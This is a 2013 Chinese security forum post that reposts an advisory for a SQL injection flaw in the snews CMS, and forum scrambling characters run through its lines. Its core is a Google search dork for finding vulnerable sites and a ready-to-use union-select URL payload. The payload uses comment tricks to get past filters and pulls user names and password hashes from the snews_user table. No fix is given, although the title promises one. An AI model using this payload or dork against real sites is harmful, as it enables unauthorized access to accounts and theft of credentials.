找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2018|回复: 0
打印 上一主题 下一主题

CMS snews SQL注射及修复

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-23 08:55:06 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
标题: CMS snews SQL Injection Vulnerability
3 D! l' o  c9 O% X# B- L作者: By onestree
4 y0 N8 z) D( h- d: ~下载地址 : http://snewscms.com/% x5 M- ]# d1 U% M1 l) D8 Z0 L+ g
测试平台 : ubuntu 12.10 / win 7: Z+ p( `  u, k5 _+ c
关键词: inurl:"tanyakan pada rumput yang bergoyang"9 ~# ]! f% l0 X' f# ^, D

: F) V6 Z- Z8 x, f* O* [( I8 H% ] 5 T5 X2 M# F- H/ I! S
*************************************************************
+ \* Z( ^* x- v+ N/ P3 r# ]+ P, X
8 b2 N6 s2 U/ `( ~  ]2 N! Y7 T( @SQL poc:
5 M6 P2 N; K  z( u5 g* ]
9 F. h* v5 K, h) @4 @$ M: E$ _http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]
) v8 s' k( ~5 R5 R9 @; A, W" l' r- Z ; \9 e' I6 K8 m5 F* {4 I
示例
& p7 K( {% Q' x* @; Z% N 9 M+ Z7 N& Z& a9 r
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*; U1 v6 l$ w- V/ {% q" z

1 X0 c8 _. Y2 K7 M. Y7 f! G9 ^4 s
/ Q% R8 o8 M3 L8 Z! F1 P- B致谢:
" w, ]# k# f4 M
" R, L$ P# d  @% l  Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
6 ?' e2 s, D0 D% S4 P7 g     
) ]( D: k6 X- s          indonesiancoder - moeslimh4x0r - go-coder. ~# b4 k4 t+ r; d" i

* ^& G, h8 J: O: u' W1 T3 a: g6 O4 Tspesial my hunny :*
% M" ^8 |( `2 g; d
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表